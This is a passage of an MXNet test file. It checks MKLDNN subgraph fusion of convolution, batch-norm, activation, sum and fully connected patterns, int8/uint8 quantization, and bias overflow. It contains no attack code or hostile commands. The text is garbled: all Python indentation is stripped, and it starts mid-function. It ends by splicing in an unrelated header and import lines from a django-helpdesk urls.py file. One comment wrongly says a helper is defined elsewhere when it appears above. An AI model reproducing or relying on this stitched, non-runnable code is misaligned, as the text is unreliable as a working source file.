for output in mod.get_outputs():
output.wait_to_read()
def check_quantize_whole_model(out_type):
batch_size = 4
data_shape = (batch_size, 4, 10, 10)
data = mx.sym.Variable('data')
conv0 = mx.sym.Convolution(data, kernel=(1, 1), num_filter=16, name='conv0')
sym = mx.sym.Convolution(conv0, kernel=(1, 1), num_filter=16, name='conv1')
sym_sg = sym.get_backend_symbol('MKLDNN_QUANTIZE')
mod = Module(symbol=sym, label_names=None)
mod.bind(for_training=False,
data_shapes=[('data', data_shape)])
mod.init_params(mx.init.Normal(0.5))
arg_params, aux_params = mod.get_params()
excluded_sym_names = []
calib_data = mx.nd.random.uniform(shape=data_shape)
calib_data = mx.io.NDArrayIter(data=calib_data)
calib_data = DummyIter(calib_data)
qsym, qarg_params, qaux_params = mx.contrib.quant.quantize_model(sym=sym_sg,
arg_params=arg_params,
aux_params=aux_params,
ctx=mx.current_context(),
excluded_sym_names=excluded_sym_names,
quantized_dtype=out_type,
calib_mode='naive',
calib_data=calib_data,
label_names=None,
num_calib_examples=1,
quantize_mode='full')
qsym = qsym.get_backend_symbol('MKLDNN_QUANTIZE')
check_qsym_forward(qsym, qarg_params, qaux_params, data_shape)
for qdtype in ['uint8', 'int8', 'auto']:
check_quantize_whole_model(qdtype)
@with_seed()
def check_fusion(sym, data_shape, attrs_dict, check_fp32_fusion=True, check_quantization=True, out_types=['uint8', 'int8', 'auto']):
if check_fp32_fusion:
data_min = -1.0
data_max = 1.0
if ''.join(sym.get_internals().list_outputs()).find('sqrt') != -1:
check_quantization = False
data_min = 0
sym_sg = sym.get_backend_symbol(SG_PASS_NAME)
for name, attrs in attrs_dict.items():
if name in config:
op_name = config[name][OP_NAME]
else:
op_name = name
assert ''.join(sym_sg.get_internals().list_outputs()).find(op_name) != -1
if len(attrs):
found = False
for k, v in sym_sg.attr_dict().items():
if k.find(op_name) != -1:
found = True
for attr_name, attr_value in attrs.items():
assert v[attr_name].lower() == attr_value.lower()
assert found
arg_shapes, _, aux_shapes = sym.infer_shape()
arg_array = [mx.nd.random.uniform(data_min, data_max, shape=shape) for shape in arg_shapes]
aux_array = [mx.nd.random.uniform(shape=shape) for shape in aux_shapes]
exe = sym.bind(ctx=mx.current_context(), args=arg_array, aux_states=aux_array, grad_req='null')
exe.forward()
os.environ['MXNET_SUBGRAPH_BACKEND'] = SG_PASS_NAME
exe_sg = sym.bind(ctx=mx.current_context(), args=arg_array, aux_states=aux_array, grad_req='null')
exe_sg.forward()
del os.environ['MXNET_SUBGRAPH_BACKEND']
for i in range(len(exe.outputs)):
assert_almost_equal(exe.outputs[i].asnumpy(), exe_sg.outputs[i].asnumpy(), rtol=1e-3, atol=1e-1)
if check_quantization:
# fp32 to int8
for out_type in out_types:
check_quantize(sym, data_shape, out_type, name=name)
# TODO(ciyong), since quantized fc save its params in int8, while gluon treat the default
# variable from symbol file as fp32 which results in mismatch dtype of params.
# Skip quantized fc in gluon pass.
if name != 'fc':
check_quantize(sym, data_shape, out_type, name=name, gluon_forward=True)
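# Hypothetical usage sketch: pair a pattern builder such as conv_bn() below
# with the attributes expected on the fused MKLDNN node and hand both to
# check_fusion(); quantization checks are skipped here to keep the sketch light.
def _example_check_fusion_usage():
    sym, attrs = conv_bn(False, (4, 4, 10, 10))
    check_fusion(sym, (4, 4, 10, 10), attrs, check_quantization=False)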
def check_neg_fusion(syms, attrs_name=None, excluded_attrs=None,
date_shape=(4,4,10,10), name='conv'):
op_name = config[name][OP_NAME]
for sym, attrs, excluded_attr in zip(syms, attrs_name, excluded_attrs):
sym_sg = sym.get_backend_symbol(SG_PASS_NAME)
exe_sg = sym_sg.simple_bind(mx.cpu(), data=date_shape, grad_req='null')
attrs_dict = sym_sg.attr_dict()
for k, v in attrs_dict.items():
if k.find(op_name) != -1:
for attr in attrs:
assert v[attr] == 'true'
for exc_attr in excluded_attr:
assert exc_attr not in v.keys()
def head_symbol(data_shape):
data = mx.symbol.Variable('data', shape=data_shape, dtype='float32')
weight = mx.symbol.Variable('weight', dtype='float32')
return data, weight
# single conv fusion case
def single_conv(no_bias, data_shape):
attr = {'conv': []}
data, weight = head_symbol(data_shape)
conv = mx.symbol.Convolution(data=data, weight=weight, name='conv', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=no_bias)
return conv, attr
# conv + bn fusion case
def conv_bn(no_bias, data_shape):
attr = {'conv': {'with_bn': 'true'}}
data, weight = head_symbol(data_shape)
conv = mx.symbol.Convolution(data=data, weight=weight, name='conv', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=no_bias)
bn1 = mx.symbol.BatchNorm(data=conv, name="bn1")
return bn1, attr
# conv + act fusion case
def conv_act(no_bias, data_shape, alg):
attr = {'conv': {'with_act': 'true'}}
data, weight = head_symbol(data_shape)
conv = mx.symbol.Convolution(data=data, weight=weight, name='conv', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=no_bias)
if alg == "relu6":
relu = mx.symbol.clip(data=conv, name='relu6', a_min=0, a_max=6)
elif alg == "leakyrelu":
relu = mx.symbol.LeakyReLU(data=conv, slope=0.25, act_type='leaky')
elif alg == "gelu":
relu = mx.symbol.LeakyReLU(data=conv, act_type='gelu')
else:
relu = mx.symbol.Activation(data=conv, name=alg, act_type=alg)
return relu, attr
# conv + act + sum fusion case
def conv_act_sum(no_bias, data_shape, alg):
attr = {'conv': {'with_act': 'true', 'with_sum': 'true'}}
data, weight = head_symbol(data_shape)
conv = mx.symbol.Convolution(data=data, weight=weight, name='conv', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=no_bias)
if alg == "relu6":
relu = mx.symbol.clip(data=conv, name='relu6', a_min=0, a_max=6)
elif alg == "leakyrelu":
relu = mx.symbol.LeakyReLU(data=conv, slope=0.25, act_type='leaky')
elif alg == "gelu":
relu = mx.symbol.LeakyReLU(data=conv, act_type='gelu')
else:
relu = mx.symbol.Activation(data=conv, name=alg, act_type=alg)
conv1 = mx.symbol.Convolution(data=data, weight=weight, name='conv1', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=no_bias)
sum = relu + conv1
return sum, attr
# conv + add fusion case
def conv_add(no_bias, data_shape):
attr = {'conv': {'with_sum': 'true'}}
data, weight = head_symbol(data_shape)
conv1 = mx.symbol.Convolution(data=data, weight=weight, name='conv1', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=no_bias)
conv2 = mx.symbol.Convolution(data=data, name='conv2', num_filter=64,
kernel=(3, 3), stride=(1, 1))
pool = mx.sym.Pooling(data=conv2, kernel=(1, 1), pool_type='avg', name='pool')
sum = conv1 + pool
return sum, attr
# conv + add fusion case 2
def conv_add2(no_bias, data_shape):
attr = {'conv': {'with_sum': 'true'}}
data, weight = head_symbol(data_shape)
conv1 = mx.symbol.Convolution(data=data, weight=weight, name='conv1', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=no_bias)
conv2 = mx.symbol.Convolution(data=data, name='conv2', num_filter=64,
kernel=(3, 3), stride=(1, 1))
pool = mx.sym.Pooling(data=conv2, kernel=(1, 1), pool_type='avg', name='pool')
sum = pool + conv1
return sum, attr
# conv + bn + act fusion case
def conv_bn_act(no_bias, data_shape, alg):
attr = {'conv': {'with_bn': 'true', 'with_act': 'true'}}
data, weight = head_symbol(data_shape)
conv = mx.symbol.Convolution(data=data, weight=weight, name='conv', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=no_bias)
bn1 = mx.symbol.BatchNorm(data=conv, name="bn1")
if alg == "relu6":
relu = mx.symbol.clip(data=bn1, name='relu6', a_min=0, a_max=6)
elif alg == "leakyrelu":
relu = mx.symbol.LeakyReLU(data=bn1, slope=0.25, act_type='leaky')
elif alg == "gelu":
relu = mx.symbol.LeakyReLU(data=bn1, act_type='gelu')
else:
relu = mx.symbol.Activation(data=bn1, name=alg, act_type=alg)
return relu, attr
# conv + bn + add + act fusion case
def conv_bn_sum_act(no_bias, data_shape, alg):
attr = {'conv': {'with_sum': 'true', 'with_postsum_act': 'true', 'with_bn': 'true'}}
data, weight = head_symbol(data_shape)
conv = mx.symbol.Convolution(data=data, weight=weight, name='conv', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=no_bias)
bn1 = mx.symbol.BatchNorm(data=conv, name="bn1")
conv1 = mx.symbol.Convolution(data=data, weight=weight, name='conv1', num_filter=64,
kernel=(3, 3), stride=(1, 1))
sum1 = bn1 + conv1
if alg == "relu6":
relu = mx.symbol.clip(data=sum1, name='relu6', a_min=0, a_max=6)
elif alg == "leakyrelu":
relu = mx.symbol.LeakyReLU(data=sum1, slope=0.25, act_type='leaky')
elif alg == "gelu":
relu = mx.symbol.LeakyReLU(data=sum1, act_type='gelu')
else:
relu = mx.symbol.Activation(data=sum1, name=alg, act_type=alg)
return relu, attr
# single concat case
def single_concat(data_shape, input_num, dim):
data = mx.symbol.Variable('data', shape=data_shape, dtype='float32')
inputs = []
for i in range(input_num):
inputs.append(data)
concat = mx.symbol.Concat(*inputs, name="concat", dim=dim)
return concat
def single_concat_pos_neg(data_shape):
data, weight = head_symbol(data_shape)
conv = mx.symbol.Convolution(data=data, weight=weight, name='conv', num_filter=4,
kernel=(1, 1), stride=(1, 1), no_bias=True)
relu = mx.symbol.Activation(data=conv, name='relu', act_type='relu')
inputs = [data, relu]
concat = mx.symbol.Concat(*inputs, name="concat", dim=1)
return concat
# concat scale alignment case
def concat_scale_align(data_shape):
data, weight = head_symbol(data_shape)
conv1 = mx.symbol.Convolution(data=data, weight=weight, name='conv1', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=True)
conv2 = mx.symbol.Convolution(data=data, weight=weight * 2, name='conv2', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=True)
conv3 = mx.symbol.Convolution(data=data, weight=weight * 3, name='conv3', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=True)
conv4 = mx.symbol.Convolution(data=data, weight=weight * 4, name='conv4', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=True)
concat = mx.symbol.Concat(*[conv1, conv2, conv3, conv4], name="concat", dim=1)
return concat
# mobilenetv2 case
def mobilenetv2_struct(data_shape):
attr = {'sg_mkldnn_conv_bn_0' : {'with_bn': 'true'}}
data = mx.symbol.Variable('data', shape=data_shape, dtype='float32')
weight1 = mx.symbol.Variable('conv1_weight', dtype='float32')
weight2 = mx.symbol.Variable('conv2_weight', dtype='float32')
conv1 = mx.symbol.Convolution(data=data, weight=weight1, name='conv1', num_filter=64,
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn1 = mx.symbol.BatchNorm(data=conv1, name="bn1")
conv2 = mx.symbol.Convolution(data=bn1, weight=weight2, name='conv2', num_filter=64,
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn2 = mx.symbol.BatchNorm(data=conv2, name="bn2")
sum = bn1 + bn2
return sum, attr
def tail_neg_symbol(sym1, sym2):
fc1 = mx.sym.FullyConnected(data=sym1, num_hidden=10, flatten=True, name='fc1')
fc2 = mx.sym.FullyConnected(data=sym2, num_hidden=10, flatten=True, name='fc2')
concat = mx.sym.Concat(*[fc1, fc2], name="concat")
sym = mx.sym.SoftmaxOutput(data=concat, name='softmax')
return sym
# conv + bn can't be fusion case
# eg.1
# conv --------- > bn
# |
# |
# -------------> [custom op]
def neg_conv_bn(data_shape):
syms = []
attrs = []
excluded_attrs = []
data, weight = head_symbol(data_shape)
# eg.1 ([custom op] = pool)
conv = mx.symbol.Convolution(data=data, weight=weight, name='conv', num_filter=64, kernel=(3, 3), stride=(1, 1))
bn1 = mx.symbol.BatchNorm(data=conv, name="bn1")
pool = mx.sym.Pooling(data=conv, kernel=(4, 4), pool_type='avg', name='pool')
sym = tail_neg_symbol(bn1, pool)
syms.append(sym)
attrs.append([])
excluded_attrs.append([])
return syms, attrs, excluded_attrs
# conv + relu can't be fusion case
# eg.1
# conv -----------> relu
# |
# |
# ---------------> [custom op]
def neg_conv_relu(data_shape):
syms = []
attrs = []
excluded_attrs = []
data, weight = head_symbol(data_shape)
# eg.1 ([custom op] = pool)
conv = mx.symbol.Convolution(data=data, weight=weight, name='conv', num_filter=64, kernel=(3, 3), stride=(1, 1))
relu = mx.symbol.Activation(data=conv, name='relu', act_type="relu")
pool = mx.sym.Pooling(data=conv, kernel=(4, 4), pool_type='avg', name='pool')
sym = tail_neg_symbol(relu, pool)
syms.append(sym)
attrs.append([])
excluded_attrs.append([])
return syms, attrs, excluded_attrs
# case where conv + add can't be fused
# eg.1
# ---------------> [custom op]
# |
# |
# conv -----------> add
# |
# |
# added ------------>
def neg_conv_add(data_shape):
syms = []
attrs = []
excluded_attrs = []
val = mx.symbol.Variable('addval')
data, weight = head_symbol(data_shape)
# eg.1 ([custom op] = pool, [added op] = val)
conv = mx.symbol.Convolution(data=data, weight=weight, name='conv', num_filter=64, kernel=(3, 3), stride=(1, 1))
sum1 = conv + val
pool = mx.sym.Pooling(data=conv, kernel=(4, 4), pool_type='avg', name='pool')
sym = tail_neg_symbol(sum1, pool)
syms.append(sym)
attrs.append([])
excluded_attrs.append(['with_sum'])
return syms, attrs, excluded_attrs
# cases where conv + bn + relu can't be fused
# eg.1 (the branch to [custom op] is taken from the conv output)
# --------------> [custom op]
# |
# conv -----------> bn -----------> relu
#
# eg.2 (the branch to [custom op] is taken from the bn output)
#                  --------------> [custom op]
#                  |
# conv -----------> bn -----------> relu
def neg_conv_bn_relu(data_shape):
syms = []
attrs = []
excluded_attrs = []
data, weight = head_symbol(data_shape)
# eg.1 ([custom op] = pool11)
conv11 = mx.symbol.Convolution(data=data, weight=weight, name='conv11', num_filter=64, kernel=(3, 3), stride=(1, 1))
bn11 = mx.symbol.BatchNorm(data=conv11, name="bn11")
relu11 = mx.symbol.Activation(data=bn11, name='relu11', act_type="relu")
pool11 = mx.sym.Pooling(data=conv11, kernel=(4, 4), pool_type='avg', name='pool11')
sym1 = tail_neg_symbol(relu11, pool11)
syms.append(sym1)
attrs.append([])
excluded_attrs.append([])
# eg.2 ([custom op] = pool)
conv21 = mx.symbol.Convolution(data=data, weight=weight, name='conv21', num_filter=64, kernel=(3, 3), stride=(1, 1))
bn21 = mx.symbol.BatchNorm(data=conv21, name="bn21")
relu21 = mx.symbol.Activation(data=bn21, name='relu21', act_type="relu")
pool21 = mx.sym.Pooling(data=bn21, kernel=(4, 4), pool_type='avg', name='pool21')
sym2 = tail_neg_symbol(relu21, pool21)
syms.append(sym2)
attrs.append(['with_bn'])
excluded_attrs.append(['with_act'])
return syms, attrs, excluded_attrs
# cases where conv + bn + add + relu can't be fused
# eg.1 (the branch to [custom op] is taken from the conv output)
# --------------> [custom op]
# |
# conv -----------> bn -----------> add -----------> relu
#
# eg.2 (the branch to [custom op] is taken from the bn output)
#                  -------------> [custom op]
#                  |
# conv -----------> bn -----------> add -----------> relu
#
# eg.3 (the branch to [custom op] is taken from the add output)
#                                   --------------> [custom op]
#                                   |
# conv -----------> bn -----------> add -----------> relu
def neg_conv_bn_add_relu(data_shape):
syms = []
attrs = []
excluded_attrs = []
addVal = mx.symbol.Variable('addval')
data, weight = head_symbol(data_shape)
# eg.1
conv11 = mx.symbol.Convolution(data=data, weight=weight, name='conv11', num_filter=64, kernel=(3, 3), stride=(1, 1))
bn11 = mx.symbol.BatchNorm(data=conv11, name="bn11")
sum11 = bn11 + addVal
relu11 = mx.symbol.Activation(data=sum11, name='relu11', act_type="relu")
pool11 = mx.sym.Pooling(data=conv11, kernel=(4, 4), pool_type='avg', name='pool11')
sym1 = tail_neg_symbol(relu11, pool11)
syms.append(sym1)
attrs.append([])
excluded_attrs.append(['with_sum', 'with_postsum_act', 'with_bn'])
# eg.2
conv21 = mx.symbol.Convolution(data=data, weight=weight, name='conv21', num_filter=64, kernel=(3, 3), stride=(1, 1))
bn21 = mx.symbol.BatchNorm(data=conv21, name="bn21")
sum21 = bn21 + addVal
relu21 = mx.symbol.Activation(data=sum21, name='relu21', act_type="relu")
pool21 = mx.sym.Pooling(data=bn21, kernel=(4, 4), pool_type='avg', name='pool21')
sym2 = tail_neg_symbol(relu21, pool21)
syms.append(sym2)
attrs.append(['with_bn'])
excluded_attrs.append(['with_sum', 'with_postsum_act'])
# eg.3
conv31 = mx.symbol.Convolution(data=data, weight=weight, name='conv31', num_filter=64, kernel=(3, 3), stride=(1, 1))
bn31 = mx.symbol.BatchNorm(data=conv31, name="bn31")
sum31 = bn31 + addVal
relu31 = mx.symbol.Activation(data=sum31, name='relu31', act_type="relu")
pool31 = mx.sym.Pooling(data=sum31, kernel=(4, 4), pool_type='avg', name='pool31')
sym3 = tail_neg_symbol(relu31, pool31)
syms.append(sym3)
attrs.append(['with_bn', 'with_sum'])
excluded_attrs.append(['with_postsum_act'])
return syms, attrs, excluded_attrs
def single_fc(no_bias, data_shape, flatten=True):
attr = {'fc': {}}
data, weight = head_symbol(data_shape)
fc = mx.symbol.FullyConnected(name='fc', data=data, weight=weight, num_hidden=64,
no_bias=no_bias, flatten=flatten)
return fc, attr
# fc + eltwise fusion case
def fc_eltwise(no_bias, data_shape, flatten=True, alg='relu'):
assert alg in fc_post_ops_list
attr = {'fc': {'with_eltwise': 'true'}}
data, weight = head_symbol(data_shape)
fc = mx.symbol.FullyConnected(name='fc', data=data, weight=weight, num_hidden=64,
no_bias=no_bias, flatten=flatten)
if alg in ['relu', 'sigmoid', 'tanh', 'softrelu']:
sym = mx.symbol.Activation(data=fc, name='act', act_type=alg)
elif alg == 'square':
sym = mx.symbol.square(data=fc, name='square')
elif alg == 'square_root':
sym = mx.symbol.sqrt(data=fc, name='sqrt')
elif alg == 'abs':
sym = mx.symbol.abs(data=fc, name='abs')
elif alg == 'exp':
sym = mx.symbol.exp(data=fc, name='exp')
else:
sym = mx.symbol.clip(data=fc, name='bounded_relu', a_min=0, a_max=1.0)
return sym, attr
# case where fc + relu can't be fused
# eg.1
# fc -----------> relu
# |
# |
# ---------------> [custom op]
def neg_fc_relu(no_bias, data_shape, flatten=True):
syms = []
attrs = []
excluded_attrs = []
data, weight = head_symbol(data_shape)
# eg.1 ([custom op] = pool)
fc = mx.symbol.FullyConnected(name='fc', data=data, weight=weight, num_hidden=64,
no_bias=no_bias, flatten=flatten)
relu = mx.symbol.Activation(data=fc, name='relu', act_type="relu")
sigmoid = mx.symbol.Activation(data=fc, name='sigmoid', act_type="sigmoid")
sym = tail_neg_symbol(relu, sigmoid)
syms.append(sym)
attrs.append([])
excluded_attrs.append([])
return syms, attrs, excluded_attrs
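# Note on the neg_* helpers above: each returns three parallel lists -- the
# symbols to run through the fusion pass, the attributes expected on the fused
# op, and the attributes that must be absent. check_neg_fusion (defined
# elsewhere in this file) is expected to assert the second and third lists
# against the resulting graph.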
@with_seed()
def test_pos_single_conv():
for data_shape in DATA_SHAPE:
net, attrs = single_conv(False, data_shape)
check_fusion(net, data_shape, attrs)
net, attrs = single_conv(True, data_shape)
check_fusion(net, data_shape, attrs)
@with_seed()
def test_pos_conv_act():
act_list = {"relu": True,
"sigmoid": True,
"tanh": True,
"softrelu": True,
"relu6": True,
"leakyrelu": True,
"gelu": True}
for data_shape in DATA_SHAPE:
for (alg, quantize) in act_list.items():
net, attrs = conv_act(False, data_shape, alg)
check_fusion(net, data_shape, attrs, check_quantization=quantize)
net, attrs = conv_act(True, data_shape, alg)
check_fusion(net, data_shape, attrs, check_quantization=quantize)
@with_seed()
def test_pos_conv_bn():
for data_shape in DATA_SHAPE:
net, attrs = conv_bn(False, data_shape)
check_fusion(net, data_shape, attrs)
net, attrs = conv_bn(True, data_shape)
check_fusion(net, data_shape, attrs)
@with_seed()
def test_pos_conv_add():
for data_shape in DATA_SHAPE:
net, attrs = conv_add(False, data_shape)
check_fusion(net, data_shape, attrs)
net, attrs = conv_add(True, data_shape)
check_fusion(net, data_shape, attrs)
@with_seed()
def test_pos_conv_add2():
for data_shape in DATA_SHAPE:
net, attrs = conv_add2(False, data_shape)
check_fusion(net, data_shape, attrs)
net, attrs = conv_add2(True, data_shape)
check_fusion(net, data_shape, attrs)
@with_seed()
def test_pos_conv_bn_act():
act_list = {"relu": True,
"sigmoid": True,
"tanh": True,
"softrelu": True,
"relu6": True,
"leakyrelu": True,
"gelu": True}
for data_shape in DATA_SHAPE:
for (alg, quantize) in act_list.items():
net, attrs = conv_bn_act(False, data_shape, alg)
check_fusion(net, data_shape, attrs, check_quantization=quantize)
net, attrs = conv_bn_act(True, data_shape, alg)
check_fusion(net, data_shape, attrs, check_quantization=quantize)
@with_seed()
def test_pos_conv_bn_sum_act():
act_list = {"relu": True,
"sigmoid": True,
"tanh": True,
"softrelu": True,
"relu6": False,
"leakyrelu": True,
"gelu": False}
for data_shape in DATA_SHAPE:
for (alg, quantize) in act_list.items():
net, attrs = conv_bn_sum_act(False, data_shape, alg)
check_fusion(net, data_shape, attrs, check_quantization=quantize)
net, attrs = conv_bn_sum_act(True, data_shape, alg)
check_fusion(net, data_shape, attrs, check_quantization=quantize)
@with_seed()
def test_pos_single_concat():
for data_shape in DATA_SHAPE:
for out_type in ('int8', 'auto'):
net = single_concat(data_shape, 2, -1)
check_quantize(net, data_shape, out_type, name='conv', check_calibration=False)
check_quantize(net, data_shape, out_type, name='conv', check_calibration=False, gluon_forward=True)
net = single_concat(data_shape, 2, 1)
check_quantize(net, data_shape, out_type, name='conv', check_calibration=False)
check_quantize(net, data_shape, out_type, name='conv', check_calibration=False, gluon_forward=True)
net = single_concat(data_shape, 4, 2)
check_quantize(net, data_shape, out_type, name='conv', check_calibration=False)
check_quantize(net, data_shape, out_type, name='conv', check_calibration=False, gluon_forward=True)
net = single_concat(data_shape, 4, 3)
check_quantize(net, data_shape, out_type, name='conv', check_calibration=False)
check_quantize(net, data_shape, out_type, name='conv', check_calibration=False, gluon_forward=True)
net = single_concat_pos_neg(data_shape)
check_quantize(net, data_shape, out_type, name='', check_calibration=False)
@with_seed()
def test_pos_concat_scale_align():
for data_shape in DATA_SHAPE:
for out_type in ('int8', 'auto'):
net = concat_scale_align(data_shape)
check_quantize(net, data_shape, out_type, check_calibration=True, check_scale_align=True)
check_quantize(net, data_shape, out_type, check_calibration=True, check_scale_align=True, gluon_forward=True)
@with_seed()
def test_mobilenetv2_struct():
for data_shape in DATA_SHAPE:
net, attrs = mobilenetv2_struct(data_shape)
check_fusion(net, data_shape, attrs, out_types=['int8', 'auto'])
@with_seed()
def test_neg_conv_bn():
for data_shape in DATA_SHAPE:
syms, attrs, excluded_attrs = neg_conv_bn(data_shape)
check_neg_fusion(syms, attrs, excluded_attrs, data_shape)
@with_seed()
def test_neg_conv_relu():
for data_shape in DATA_SHAPE:
syms, attrs, excluded_attrs = neg_conv_relu(data_shape)
check_neg_fusion(syms, attrs, excluded_attrs, data_shape)
@with_seed()
def test_neg_conv_add():
for data_shape in DATA_SHAPE:
syms, attrs, excluded_attrs = neg_conv_add(data_shape)
check_neg_fusion(syms, attrs, excluded_attrs, data_shape)
@with_seed()
def test_neg_conv_bn_relu():
for data_shape in DATA_SHAPE:
syms, attrs, excluded_attrs = neg_conv_bn_relu(data_shape)
check_neg_fusion(syms, attrs, excluded_attrs, data_shape)
@with_seed()
def test_neg_conv_bn_add_relu():
for data_shape in DATA_SHAPE:
syms, attrs, excluded_attrs = neg_conv_bn_add_relu(data_shape)
check_neg_fusion(syms, attrs, excluded_attrs, data_shape)
@with_seed()
def test_single_fc():
for dshape, no_bias, flatten in itertools.product(DATA_SHAPE, [True, False], [True, False]):
syms, attrs = single_fc(no_bias, dshape, flatten)
if flatten is True:
check_fusion(syms, dshape, attrs, check_quantization=True)
else:
check_fusion(syms, dshape, attrs, check_quantization=False)
@with_seed()
def test_fc_eltwise():
for dshape, no_bias, flatten, alg in itertools.product(DATA_SHAPE,
[True, False],
[True, False],
fc_post_ops_list):
syms, attrs = fc_eltwise(no_bias, dshape, flatten, alg)
if flatten is True:
check_fusion(syms, dshape, attrs, check_quantization=True)
else:
check_fusion(syms, dshape, attrs, check_quantization=False)
@with_seed()
def test_neg_fc_relu():
for dshape, no_bias, flatten in itertools.product(DATA_SHAPE, [True, False], [True, False]):
syms, attrs, excluded_attrs = neg_fc_relu(no_bias, dshape, flatten)
check_neg_fusion(syms, attrs, excluded_attrs, dshape, name='fc')
def test_float64_fallback():
sym = mx.sym.FullyConnected(
mx.sym.Variable('in'),
mx.sym.Variable('w'),
mx.sym.Variable('b'),
num_hidden=2
)
dtype = 'float64'
ex = sym.bind(mx.cpu(),
{
'in': mx.nd.array([[2, 3, 4]], dtype=dtype),
'w': mx.nd.array([[1, 2, 3], [4, 5, 6]], dtype=dtype),
'b': mx.nd.array([7, 8], dtype=dtype)
},
args_grad=None,
grad_req='write'
)
ex.forward()
ex.outputs[0].wait_to_read()
def helper_quantized_conv_bias_overflow(data_min, data_max, weight_min, weight_max):
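# Builds an fp32 convolution with bias over random data in the given ranges,
# quantizes the fused symbol to int8 using naive calibration on a single batch,
# then checks the int8 output against the fp32 reference within rtol/atol/etol.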
data_shape = (1, 32, 2, 2)
data = mx.symbol.Variable('data', shape=data_shape, dtype='float32')
weight = mx.symbol.Variable('weight', dtype='float32')
bias = mx.symbol.Variable('bias', dtype='float32')
sym = mx.symbol.Convolution(data=data, weight=weight, bias=bias, name='conv', num_filter=64,
kernel=(1, 1), stride=(1, 1))
data_nd = mx.random.uniform(data_min, data_max, shape=data_shape, ctx=mx.cpu())
weight_nd = mx.random.uniform(weight_min, weight_max, shape=[64, 32, 1, 1], ctx=mx.cpu())
bias_nd = mx.random.uniform(-1, +1, shape=[64], ctx=mx.cpu())
arg_params = {
'data': data_nd,
'weight': weight_nd,
'bias': bias_nd
}
ex = sym.bind(mx.cpu(), arg_params, args_grad=None)
ex.forward()
ex.outputs[0].wait_to_read()
sym_sg = sym.get_backend_symbol(QUANTIZE_SG_PASS_NAME)
batch = mx.io.DataBatch([data_nd], [])
calib_data = CalibIter(batch, data_shape, 1)
qsym, qarg_params, qaux_params = mx.contrib.quant.quantize_model(sym=sym_sg,
arg_params={
'weight': weight_nd,
'bias': bias_nd
},
aux_params={},
ctx=mx.cpu(),
excluded_sym_names=None,
excluded_op_names=None,
quantized_dtype='int8',
calib_mode='naive',
calib_data=calib_data,
label_names=None,
num_calib_examples=1,
quantize_mode='full')
qsym = qsym.get_backend_symbol(QUANTIZE_SG_PASS_NAME)
qarg_params['data'] = data_nd
qex = qsym.bind(mx.cpu(), qarg_params, args_grad=None)
qex.forward()
qex.outputs[0].wait_to_read()
assert_almost_equal_with_err(ex.outputs[0].asnumpy(), qex.outputs[0].asnumpy(),
rtol=1e-2, atol=1e-2, etol=0.01)
def helper_quantized_fc_bias_overflow(data_min, data_max, weight_min, weight_max):
data_shape = (1, 32)
data = mx.symbol.Variable('data', shape=data_shape, dtype='float32')
weight = mx.symbol.Variable('weight', dtype='float32')
bias = mx.symbol.Variable('bias', dtype='float32')
sym = mx.symbol.FullyConnected(data=data, weight=weight, bias=bias, name='fc', num_hidden=64)
data_nd = mx.random.uniform(data_min, data_max, shape=data_shape, ctx=mx.cpu())
weight_nd = mx.random.uniform(weight_min, weight_max, shape=[64, 32], ctx=mx.cpu())
bias_nd = mx.random.uniform(-1, +1, shape=[64], ctx=mx.cpu())
arg_params = {
'data': data_nd,
'weight': weight_nd,
'bias': bias_nd
}
ex = sym.bind(mx.cpu(), arg_params, args_grad=None)
ex.forward()
ex.outputs[0].wait_to_read()
sym_sg = sym.get_backend_symbol(QUANTIZE_SG_PASS_NAME)
batch = mx.io.DataBatch([data_nd], [])
calib_data = CalibIter(batch, data_shape, 1)
qsym, qarg_params, qaux_params = mx.contrib.quant.quantize_model(sym=sym_sg,
arg_params={
'weight': weight_nd,
'bias': bias_nd
},
aux_params={},
ctx=mx.cpu(),
excluded_sym_names=None,
excluded_op_names=None,
quantized_dtype='int8',
calib_mode='naive',
calib_data=calib_data,
label_names=None,
num_calib_examples=1,
quantize_mode='full')
qarg_params['data'] = data_nd
qsym = qsym.get_backend_symbol(QUANTIZE_SG_PASS_NAME)
qex = qsym.bind(mx.cpu(), qarg_params, args_grad=None)
qex.forward()
qex.outputs[0].wait_to_read()
assert_almost_equal_with_err(ex.outputs[0].asnumpy(), qex.outputs[0].asnumpy(),
rtol=1e-2, atol=1e-2, etol=0.01)
@with_seed()
def test_quantized_conv_bias_overflow():
helper_quantized_conv_bias_overflow(-1, 1, 0, 0)
helper_quantized_conv_bias_overflow(-1, 1, -1e-6, +1e-6)
helper_quantized_conv_bias_overflow(0, 0, 1, 1)
helper_quantized_conv_bias_overflow(-1e-6, +1e-6, -1, 1)
helper_quantized_conv_bias_overflow(-1e-6, +1e-6, -1e-6, +1e-6)
helper_quantized_conv_bias_overflow(0, 0, 0, 0)
@with_seed()
def test_quantized_fc_bias_overflow():
helper_quantized_fc_bias_overflow(-1, 1, 0, 0)
helper_quantized_fc_bias_overflow(-1, 1, -1e-6, +1e-6)
helper_quantized_fc_bias_overflow(0, 0, 1, 1)
helper_quantized_fc_bias_overflow(-1e-6, +1e-6, -1, 1)
helper_quantized_fc_bias_overflow(-1e-6, +1e-6, -1e-6, +1e-6)
helper_quantized_fc_bias_overflow(0, 0, 0, 0)
if __name__ == "__main__":
import nose
nose.runmodule()
|
|
"""
django-helpdesk - A Django powered ticket tracker for small enterprise.
(c) Copyright 2008 Jutda. All Rights Reserved. See LICENSE for details.
urls.py - Mapping of URLs to our various views. Note that we always use NAMED
views for simplicity in linking later on.
"""
from django.conf import settings
import django
from helpdesk.views.public import TicketDetails, CreateTicket, UpdateTicket, ChangeLanguage
